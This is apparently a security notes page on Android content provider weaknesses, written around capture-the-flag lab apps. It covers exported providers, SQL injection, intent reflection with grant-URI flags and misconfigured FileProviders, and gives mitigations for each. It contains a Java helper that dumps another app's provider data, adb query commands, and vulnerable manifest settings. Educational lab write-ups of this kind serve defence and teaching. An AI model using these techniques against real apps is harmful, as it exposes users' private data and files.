Content Providers

Content provider in android provides secure way to share app's data with other apps.

Exported Content Provider

If a vulnerable app has exported content provider, it means any malicious app can query & access the content providers using the vulnerable app's authority.

public void dump(Uri uri, String projection[], String selection, String[] selectionArgs, String sortOrder) {
    Cursor cursor = getContentResolver().query(uri, projection, selection, selectionArgs, sortOrder);
    if(cursor==null){
        System.out.println(uri.toString()  + " Content Provider " + "not resolved");
    }
    if (cursor.moveToFirst()) {
        do {
            StringBuilder sb = new StringBuilder();
            for (int i = 0; i < cursor.getColumnCount(); i++) {
                if (sb.length() > 0) {
                    sb.append(", ");
                }
                sb.append(cursor.getColumnName(i) + " = " + cursor.getString(i));
            }
        Log.d("evil", sb.toString());
        } while (cursor.moveToNext());
    }
}

Projection - Columns to display, selection - Where condition which should be executed, sortOrder - Order of sorting

You can also use adb to query content provider uri -

adb shell content query --uri "content://io.hextree.flag30/success"

To query particular ID if supported -

adb shell content query --uri "content://io.hextree.flag31/flag/31#

Impact: Malicious app can access vulnerable app's data by querying from vulnerable app's content provider.

Mitigation: Do not export content provider, unless really required. Implement proper permissions to query the content provider data.

SQL injection in Content Provider

When attacker controlled parameter is passed in building SQL query, it might lead to SQL injection.

Impact: Attacker app can access parts of database which is not intended to be exposed by the content provider implementation.

Mitigation: Sanitize user input before appending them in SQL queries, Use Parameterized SQL Queries.

FLAG_GRANT_READ_URI_PERMISSION flag set in Intent

<provider android:name="io.hextree.attacksurface.providers.Flag33Provider1" android:enabled="true" android:exported="false" android:authorities="io.hextree.flag33_1" android:grantUriPermissions="true"/>

Although provider is not exported, If FLAG_GRANT_READ_URI_PERMISSION(1) is set to intent, the recipient of intent will be granted read access to the content provider.

If there's a intent reflection vulnerability where intent sent by attacker to vulnerable app is sent back without checking if FLAG_GRANT_READ_URI_PERMISSION is set by attacker initially, can also make content provider vulnerable even if provider is not exported.

In the below example vulnerable app has permission for Android CONTACTS content provider, but Vulnerable app doesn't, but vulnerable app uses intent reflection vulnerability in vulnerable app to access contacts.

Impact: Malicious app can access content providers of vulnerable app without providers being exported themselves.

Mitigation: Validate calling package name & class name before sending intent with FLAG_GRANT_READ_URI_PERMISSION flag. Do not set FLAG_GRANT_READ_URI_PERMISSION flag unless really necessary.

Vulnerable File Providers

Content providers not only expose databases, but also might expose file providers which grants permission to malicious apps to access vulnerable app's files.

Sample File Content Provider URI for filepaths.xml: content://io.hextree.files/flag_files/flag34.txt

Original File Location: /data/data/io.hextree.attacksurface/files/flags/flag34.txt

Sample File Content Provider URI for rootpaths.xml: content://io.hextree.root/root_files/data/data/io.hextree.attacksurface/flag35.txt

Original File Location: /data/data/io.hextree.attacksurface/flag35.txt

<provider android:name="androidx.core.content.FileProvider" android:exported="false" android:authorities="io.hextree.files" android:grantUriPermissions="true">
    <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/filepaths"/>
</provider>
<provider android:name="io.hextree.attacksurface.providers.Flag35FileProvider" android:exported="false" android:authorities="io.hextree.root" android:grantUriPermissions="true">
    <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/rootpaths"/>
</provider>

<!-- filepaths.xml-->
<paths>
    <files-path name="flag_files" path="flags/"/>
    <files-path name="other_files" path="."/>
</paths>
<!-- rootpaths.xml-->
<paths>
    <root-path name="root_files" path="/"/>
</paths>

FLAG_GRANT_WRITE_URI_PERMISSION flag set in Intent

Although provider is not exported, If FLAG_GRANT_WRITE_URI_PERMISSION(2) or FLAG_GRANT_READ_URI_PERMISSION|FLAG_GRANT_WRITE_URI_PERMISSION(3) is set to intent, the recipient of intent will be granted write access to the content provider.

That's recipient of intent will be able to write into database or files of vulnerable app.

Impact: Malicious app able to write into database/files of vulnerable app, writing native libraries used by vulnerable app may lead to command execution.

Mitigation: Validate calling package name & class name before sending intent with FLAG_GRANT_WRITE_URI_PERMISSION flag. Do not set FLAG_GRANT_WRITE_URI_PERMISSION flag unless really necessary.

Vulnerable File Provider Recievers

PreviousCommon Intent Vulnerabilities NextBroadcasts

Last updated 1 year ago